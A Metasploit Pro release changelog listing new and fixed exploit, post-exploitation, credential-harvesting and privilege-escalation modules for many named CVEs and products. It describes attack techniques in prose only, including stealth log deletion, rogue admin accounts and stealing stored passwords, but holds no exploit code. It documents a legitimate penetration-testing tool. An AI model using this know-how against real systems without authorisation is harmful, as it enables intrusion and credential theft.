Metasploit Pro Changelog

What's new in Metasploit Pro 4.22.2 (April 17, 2024)

  • Improved:
  • PR 18906 - Adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
  • PR 19052 - Updates Metasploit's User Agent strings to values valid for April 2024.
  • PR 19064 - Adds support to the auxiliary/scanner/snmp/snmp_login module to work over the TCP protocol in addition to UDP.
  • Fixed:
  • PR 18935 - Fixes a common user mistake when authenticating with LDAP modules. Users can now specify either the USERNAME (user) and DOMAIN (domain.local) datastore options, or the original format of just the USERNAME in UPN form (user@domain.local). This fix updates the LDAP library.
  • PR 19007 - Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
  • PR 19021 - Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.
  • PR 19056 - Fixes an issue where the socket would be closed when targeting a single host with multiple user_file/pass_file module option combinations. This happened when a session was successfully opened and the next login attempt then closed the socket being used by the newly created session.
  • PR 19059 - Fixes an issue with the psnuffle module's POP3 support.
  • PR 19069 - Fixes an edge case affecting clients that programmatically interacted with Metasploit's remote procedure call (RPC) functionality, which caused the login modules for SMB, Postgres, MySQL, and MSSQL to open a new session by default instead of as opt-in behavior.
  • Modules:
  • PR 18764 - Adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary file read (first two lines of a file) on Jenkins versions prior to 2.442 or, for the LTS stream, versions prior to 2.426.3.
  • PR 18915 - Adds a module for a buffer overflow at the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.
  • PR 18962 - Adds a post module to leverage CVE-2023-22649 which is a sensitive information leak in the rancher service's audit logs.
  • PR 19044 - Adds an exploit module that exploits Gibbon online school platform version 26.0.00 and lower to achieve remote code execution. Note that authentication is required. This leverages a PHP deserialization attack via columnOrder in a POST request (CVE-2024-24725).
  • PR 19051 - Adds a new module to add to, list, flush and delete from the LDAP msDS-KeyCredentialLink attribute, which enables users to perform "shadow credential" attacks for persistence and lateral movement.

New in Metasploit Pro 4.22.2 (February 15, 2024) (Feb 29, 2024)

  • Improved:
  • Pro: The create-segmentation-target.sh script has been updated to support modern Debian environments.
  • Pro: The scan UI has been updated to work with both IPv4 and IPv6 addresses. Previously scans supported only one address type, but now both are supported.
  • Pro: Updates multiple documentation links to updated locations.
  • PR 17634 - Reliability and stability notes that have been previously missing have been added to some modules.
  • PR 17667 - Makes various performance and output readability improvements to Metasploit's password cracking functionality. Hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there are no more hashes left, empty tables are no longer printed, support for Hashcat username functionality has been added, a quiet option has been added, and documentation has been added to the wiki, among other code optimizations.
  • PR 17689 - Adds an additional column to the creds command to additionally show any cracked passwords that have been created by the auxiliary/analyze/crack_databases module or similar modules.
  • PR 18218 - This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
  • PR 18256 - Performs a routine update of multiple library dependencies.
  • PR 18296 - Updates multiple MySQL modules to support authenticating with newer versions of MySQL.
  • PR 18299 - Improves error messages for timeouts when interacting with a Meterpreter session. Before an unclear error was printed. Now the user is notified how to increase the timeout limit.
  • PR 18364 - Adds support for filtering sessions based on last checkin time, session type, and ID.
  • PR 18379 - This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator filtered out valid credentials when the hostname wasn't an exact match, even though credentials for a domain (e.g. windomain.local) should work on a subdomain (e.g. dc.windomain.local).
  • PR 18383 - This PR adds a variety of improvements to the enum_computers module, including Shell and PowerShell support as well as improvements when running on non-English systems.
  • PR 18386 - This PR adds the lmkdir command to Meterpreter, which creates a directory on the local host.
  • PR 18394 - This PR adds documentation for the auxiliary/scanner/http/http_traversal module.
  • PR 18421 - This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
  • PR 18428 - This PR adds documentation for the mssql_login module.
  • PR 18441 - Adds at-rest encryption to Meterpreter payloads on the Metasploit host machine's file system.
  • PR 18446 - This PR makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • PR 18451 - Updates the newly added cracked password column as part of the creds command to work with the remote database.
  • PR 18463 - This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds advanced detection logic (check method). This module leverages a command injection vulnerability that exists in multiple D-Link network products, which allows an attacker to inject arbitrary commands into the UPnP service via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • PR 18484 - Updates the multi/manage/shell_to_meterpreter module with additional options for overriding the calculated platform and PowerShell arch value; these options can be seen with the advanced options.
  • PR 18504 - Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.
  • PR 18515 - This PR adds a Java target for the ManageEngine ServiceDesk Plus exploit for CVE-2022-47966 and deletes the log file that records the error caused by the exploit, to make it more stealthy.
  • PR 18548 - Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
  • PR 18560 - This updates the existing Kerberos ticket-forging module with new actions for forging tickets with fields copied from ones issued by the legitimate KDC using the Diamond and Sapphire techniques.
  • PR 18565 - This PR adjusts the Kerberos cache lookup logic. If no TGT for the specific host is found, it will try again with any host. This fixes the workflow where a user can currently forge a golden ticket, but that ticket would not be automatically used for authentication by other services. This will also cover the TGTs created by the Diamond and Sapphire techniques.
  • PR 18571 - Improves the error messages shown to users if there is a validation error with a module's RHOST datastore values. Now the user is notified when there is a failure with parsing a URL, invalid CIDR, or DNS resolution failure.
  • PR 18580 - Metasploit modules developed using Python can now provide default_options as part of an exploit.
  • PR 18598 - This PR bumps the metasploit-payloads version to bring in one fix and one enhancement. The fix standardizes the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement better aligns pretty OS names on Windows for Windows Kernel 10 releases, i.e. Windows Server 2016 and later or Windows 10/11 and later.
  • PR 18622 - Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
  • PR 18623 - This updates the file handling of the generate command's -o parameter to expand file system paths.
  • PR 18631 - This PR improves the check method of the vcenter_java_wrapper_vmon_priv_esc module. Previously the module attempted to see if a file was writable before checking whether the file existed on the system, which caused the check method to return an error message along with the check code. This PR fixes that issue.
  • PR 18632 - This PR improves the glibc tunables privilege escalation module. If the file command is not present on the target, the module will try to use the readelf command to get the ld.so build ID and determine whether or not the target is compatible with the exploit.
  • PR 18680 - This adds a service compatible with Rex::ServiceManager for SMB that can be shared among modules.
  • PR 18691 - Metasploit console now requires an installed version of apktool greater than or equal to v2.9.2.
  • PR 18720 - This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad characters when using the new fetch payloads.
  • PR 18735 - Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
  • PR 18737 - This updates the metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows.
  • PR 18742 - Enhances the post/multi/gather/memory_search with additional UX improvements such as outputting a list of matched processes that are being targeted, as well as improved error handling if the process architecture is not correct.
  • PR 18747 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
  • PR 18761 - Adds a user notification that new modules support a CreateSession option. This functionality is currently behind a feature flag which can be enabled with the features command.
  • PR 18806 - Improves unknown command handling by suggesting similar valid commands.
  • PR 18825 - Improves the error messages when the current session is not compatible with a post module.
  • Payload Enhancements:
  • PR 18355 - This PR contains a metasploit-payloads fix which enables the Java Meterpreter to run on the latest OpenJDK. Prior to this change the Java Meterpreter was broken due to changes in JDK 9's reflection policy. The new approach avoids the use of problematic URLClassLoaders and implements Metasploit's own ClassLoader type.
  • Fixed:
  • PR 18400 - This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
  • PR 18403 - Fixes a potential bug with modules that register files to cleanup after a session opens. Previously modules could accidentally mutate registered file names to delete, causing the intended files to be left on the remote system.
  • PR 18411 - Fixes an edge-case where the services -R command generated invalid hosts such as 192.0.2.2% if an empty string was registered for the scope metadata instead of nil.
  • PR 18431 - Updates the order in which the lhost and lport are displayed to the user in the portfwd command.
  • PR 18443 - Adds a fix for the handler/reverse_ssh module that was returning warnings when msfconsole was booted on a Windows machine.
  • PR 18448 - Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
  • PR 18449 - Fixes an issue with the scanner/mysql/mysql_authbypass_hashdump module to now correctly close sockets.
  • PR 18506 - This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly, the module now retries logging in if the first attempt fails.
  • PR 18532 - Fixes crashes in the DB2 scanner module.
  • PR 18547 - This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
  • PR 18558 - Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
  • PR 18564 - Fixes a module crash when running the auxiliary/server/capture/http module.
  • PR 18579 - This converts the module to use the new style of Windows version detection that was added in https://github.com/rapid7/metasploit-framework/pull/17336. This will become more important once the Windows Meterpreter returns a more accurate string for the sysinfo OS field.
  • PR 18603 - Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).
  • PR 18606 - rpc_plugin has been updated to correctly use the provided plugin options.
  • PR 18609 - This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
  • PR 18613 - Ensures that after listing files within an SMB directory that the handle is closed.
  • PR 18614 - Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.
  • PR 18655 - Fixes the hierarchical search functionality so that, when it is enabled and only one module result is found, that module is automatically used.
  • PR 18667 - Re-adds the #sysinfo instance method for sessions.
  • PR 18673 - Fixes spelling mistakes in Metasploit's scripts folder.
  • PR 18690 - Ensures that a target's default payload is correctly chosen when selecting a module from the search command.
  • PR 18710 - Fixes an uninitialized constant Msf::Simple::Exploit::ExploitDriver exception that could sometimes occur when running Metasploit framework's payload modules.
  • PR 18712 - Fixes a crash with Metasploit's REST api when calling /api/v1/modules?name=aux.
  • PR 18746 - Fixes a module bug when using the generate OPTION=VALUE syntax. Previously the module's datastore would be unintentionally updated with the new option value.
  • PR 18750 - Updates the to_handler command for payload modules to support option overrides. The to_handler command is a convenient way of using multi/handler, setting the payload, and setting datastore options.
  • PR 18760 - Fixes an issue where Metasploit fails to start when resolv.conf cannot be found.
  • PR 18774 - Updates the following modules to now work with newer versions of sqlcmd, post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
  • PR 18798 - This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module's check method that was causing version comparisons to fail.
  • PR 18799 - This fixes an issue in the exploit/windows/local/cve_2020_17136 module's check method that was causing version comparisons to fail.
  • PR 18800 - This fixes an issue in the exploit/windows/local/cve_2021_40449 module's check method that was causing version comparisons to fail.
  • PR 18801 - This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module's check method that was causing version comparisons to fail.
  • PR 18803 - Fixes a crash when using exploit/multi/handler with an invalid payload name.
  • PR 18812 - Reverts the auxiliary/scanner/mssql/mssql_login module's TDSENCRYPTION default value to false.
  • PR 18813 - Fixes a crash when running the help services or help hosts commands.
  • PR 18823 - Fixes the module metadata platform list comparison.
  • PR 18826 - Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
  • Modules:
  • PR 18194 - This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it is also able to directly update the plaintext database files (/etc/passwd and /etc/shadow). This module requires root privileges.
  • PR 18348 - This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, allowing a lower privileged user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.
  • PR 18351 - This adds an exploit for CVE-2023-37941 which is an authenticated RCE in Apache Superset.
  • PR 18404 - This adds an exploit for CVE-2023-38146 AKA ThemeBleed which is a TOCTOU issue in the way Windows handles theme files. The vulnerability can be leveraged to load a payload DLL from Metasploit to execute code within the context of the user who loads it. A legitimate signed theme DLL must be provided in order to use the exploit.
  • PR 18417 - Kibana before version 7.6.3 suffers from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're able to execute arbitrary code in the context of the Kibana user. There is no CVE for this at the moment.
  • PR 18427 - This PR adds a module that exploits PyTorch TorchServer by chaining an SSRF vulnerability with a deserialization RCE vulnerability to permit an unauthenticated remote attacker arbitrary Java code execution. The PR also fixes how the ClassLoader mixin handles datastore options.
  • PR 18434 - This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).
  • PR 18447 - This adds an exploit for CVE-2023-22515 which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.
  • PR 18460 - This adds a new exploit module that leverages the fact that SSH keys on VMware Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeeds and gains unauthorized remote access as the "support" (root) user.
  • PR 18461 - This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions 8.0.0 through 8.3.2, 8.4.0 through 8.4.2, and 8.5.0 through 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware, then uploads a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created; this requires manual cleanup.
  • PR 18481 - This adds an exploit module that leverages a command injection vulnerability in MagnusBilling versions 6 and 7. This vulnerability is identified as CVE-2023-30258 and allows unauthenticated remote code execution in the context of the user running the web server process.
  • PR 18488 - This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid.
  • PR 18492 - This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.
  • PR 18494 - This PR adds an RCE module for AjaxPro which leverages an insecure deserialization of data to get remote code execution on the target OS in the context of the user running the website which utilized AjaxPro.
  • PR 18497 - This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.
  • PR 18501 - This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.
  • PR 18503 - This PR adds a post module to steal config and credential information for Apache NiFi.
  • PR 18507 - This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.
  • PR 18541 - This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.
  • PR 18542 - This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.
  • PR 18566 - This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server.
  • PR 18567 - This pull request adds a new exploit module for, CVE-2023-5360, an unauth file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin in versions before 1.3.79.
  • PR 18568 - This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.
  • PR 18569 - This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using an LDAP query to request the relevant usernames, followed by requesting TGTs.
  • PR 18577 - This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.
  • PR 18578 - This PR adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.
  • PR 18591 - This PR adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP and S3 credentials.
  • PR 18604 - This pull request introduces a new post module to extract Mikrotik Winbox credentials saved in the "settings.cfg.viw" file when the "Keep Password" option is selected in Winbox.
  • PR 18612 - This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.
  • PR 18626 - This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.
  • PR 18627 - This adds three post-exploitation modules for Ansible. The first one gathers information and configuration. The second exploits an arbitrary file read that enables an attacker to read the first line of a file (typically /etc/shadow) when the compromised account is configured with password-less sudo permissions. The last one is an exploit that can deploy a payload to all the nodes in the network.
  • PR 18628 - This PR adds a post gather module to get Puppet configs and other sensitive files.
  • PR 18630 - This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.
  • PR 18633 - This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.
  • PR 18635 - This PR adds a module for an authenticated Splunk information disclosure vulnerability. This module gathers information about the host machine and the Splunk install including OS version, build, CPU arch, Splunk license keys etc.
  • PR 18638 - Adds an exploit module for CVE-2022-42889 that targets web apps utilising Apache Commons Text's (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.
  • PR 18648 - This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication bypass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445), allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.
  • PR 18664 - This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.
  • PR 18708 - This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.
  • PR 18713 - Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.
  • PR 18734 - This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.
  • PR 18755 - This PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679, where the former is a patch bypass for the latter. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget.
  • PR 18762 - This pull request adds an exploit module for CVE-2024-0204 which is a path traversal vulnerability which results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.
  • PR 18769 - This PR adds an exploit module which leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE.
  • PR 18780 - This adds a local privilege escalation exploit that leverages an internal file descriptor leak in runc versions prior to 1.1.12. An attacker with docker privileges is able to write an arbitrary file on the host file system with the permissions of runc (typically root). With this, the module uploads a payload and sets the execute and SUID permissions to escalate privileges.
  • PR 18807 - This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

New in Metasploit Pro 4.22.2 (September 29, 2023) (Oct 4, 2023)

  • Improved:
  • Adds support to the Capcom.sys driver LPE for Windows 11 21H1.
  • Improves the Windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
  • PR 18190 - Improves the Linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
  • PR 18191 - Adds support for detecting whether a Metasploit session is running in a Podman container and improves detection for sessions running in Docker, LXC and WSL containers.
  • PR 18214 - Makes two improvements to the fetch payloads. The first improvement is that the FETCH_SRVHOST option will be set to LHOST when LHOST is set and FETCH_SRVHOST is not. That means there is one less option users need to set when using a payload with a reverse stager. The second improvement is that the default command for the Windows HTTP payload has been changed to CERTUTIL which will offer better compatibility with older versions of Windows than the previous CURL command. The HTTPS and TFTP payloads will still default to CURL.
  • Adds index selection for the modules returned via the favorites (or show favorites) command.
  • Adds tests to ensure the consistency of Metasploit payloads.
  • Adds ability to select favorite modules with the use command after running show favorites, similar to the search command.
  • Improves tab completion for the set and unset commands.
  • Updates CVE-2020-14871 exploits/solaris/ssh/pam_username_bof docs.
  • Updates all PostgreSQL modules to now support a newer form of authentication (SASL-SCRAM-256) that pentesters are now more frequently seeing in the wild. This includes the modules for PostgreSQL authentication brute force, version fingerprinting, running queries, etc.
  • Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to Github Actions that verify OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.
  • Improves error messages when failing to interact with a network interface such as calling set LHOST=.
  • Fixes documentation typos with the exploit/multi/http/subrion_cms_file_upload_rce module.
  • Improves the readability of documentation/modules/exploit/windows/http/smartermail_rce.
  • Updates the ldap_query module to stream the results instead of collecting them all at once, improving the user experience when using the module in large target environments with thousands of accounts.
  • Updates the Elasticsearch auxiliary module. It has been renamed to elastic_enum, accepts credentials, and will store data to disk that is pulled from the target.
  • Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
  • Adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
  • Updates the search command with the additional search keywords stage:, stager: and adapter:.
  • Fixes a bug in 7 modules that specified the RelatedModules metadata incorrectly. Now, the RelatedModules data is correctly shown to the user when running the info command.
  • Adds a check to the auxiliary/scanner/smtp/smtp_relay scanner module to confirm whether the server supports the EHLO command. If not, the module falls back to initiating the session with the HELO command instead.
  • Fixes multiple spelling mistakes in module documentation.
  • Fixed:
  • Fixed an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
  • Adds additional error handling when loading Metasploit payloads during msfconsole's startup process to ensure missing payloads do not crash msfconsole.
  • Adds validation for the EC2_ID module option.
  • Fixes an issue in the exploit module multi/http/adobe_coldfusion_rce_cve_2023_26360 when the target ColdFusion server is deployed with a Development profile.
  • Updates the module metadata for the Java reverse_http and reverse_https stagers to be treated as a dynamic payload size, instead of a static/fixed size. This size change can happen as the Java payload contains a user-configurable HTTP callback URL, and combined with the Zip compression present in JAR files - the overall generated payload size can change as a result.
  • Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
  • Fixes a stack trace thrown by the forge_ticket module when the SPN datastore option was left blank. The module now fails due to bad-config and gives a detailed error message.
  • Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.
  • Fixes the broken scanner/mysql/mysql_authbypass_hashdump module and adds documentation for the module.
  • Changes the behavior of setting LHOST to an interface name, for example with set LHOST eth0. Previously, a non-deterministic IP would be resolved from the adapter name if the adapter had multiple IPv4/IPv6 addresses registered. Now, the lowest ordinal IPv4 address is preferred, followed by any IPv6 addresses.
  • Fixes a crash when parsing ThriftHeader binary data.
  • Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
  • Fixes an issue which could have caused a new msfrpc console instance to hang forever.
  • Fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
  • Fixes an issue where msfrpc would hang when updating saved command history.
  • Modules:
  • Adds a module that chains together a log poisoning LFI, redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.
  • Adds two modules for targeting vulnerabilities related to the signing of Flask's session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.
  • Adds a module for an unauthenticated RCE against Metabase. Metabase versions before 0.46.6.1 have a bug where an unauthenticated user can retrieve a setup-token. With this, they can query an API endpoint to set up a new database, then inject an H2 connection string for RCE.
  • Adds an exploit module that leverages an unauthenticated remote command execution vulnerability in Chamilo versions 1.11.18 and below. This vulnerability is identified as CVE-2023-34960. Due to a functionality called Chamilo Rapid, used to easily convert PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at the OS level using a malicious SOAP request to the vulnerable endpoint /main/webservices/additional_webservices.php.
  • Adds an exploit module that leverages an authentication bypass and an arbitrary file upload in Netgear ProSAFE NMS300. These vulnerabilities have been identified as CVE-2023-38096 and CVE-2023-38098 respectively and affect versions below 1.7.0.22. By chaining these vulnerabilities together, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges.
  • Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY\SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348).
  • Adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.
  • Adds an exploit module for an Apache NiFi H2 remote code execution identified as CVE-2023-34468. Versions 0.0.2 through 1.21.0 are vulnerable and allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. This also adds a library with helper functions for modules targeting this product.
  • Adds an unauthenticated command injection module for the RaspAP webgui application.
  • Updates the exploits/freebsd/http/citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler) 12.1-65.25, and 12.1-64.17. This module now supports automatic targeting based on the Last-Modified header of the logon/fonts/citrix-fonts.css resource.
  • Adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.
  • Adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.
  • Adds a module that detects Windows hosts that are vulnerable to https://github.com/advisories/GHSA-xvhr-xr27-hpmq aka QueueJumper.
  • Adds a module that achieves unauthenticated command injection by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow's example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running the Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's Experimental REST API to perform malicious actions such as triggering the vulnerable DAG above.
  • Adds a module to retrieve an arbitrary file from hosts running Roundcube versions 1.1.0 through 1.3.2.
  • Creates two modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.
  • This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.
  • Adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.
  • Adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10 x64 22H2.
  • Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.
  • Adds an exploit module that targets Ivanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.
  • Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.
  • Adds a module that exploits broken access control and directory traversal vulnerabilities to achieve unauthenticated remote code execution on LG Simple Editor versions <= v3.21. The module achieves code execution in the context of NT AUTHORITY\SYSTEM by uploading and executing a JSP payload.
  • Adds an exploit module that targets Ivanti Sentry (formerly MobileIron Sentry), which is vulnerable to an authentication bypass that exposes API functionality, allowing for code execution in the context of the root user.
  • Adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.
  • Adds a module covering CVE-2023-38831, a file-format vulnerability affecting WinRAR 6.22.
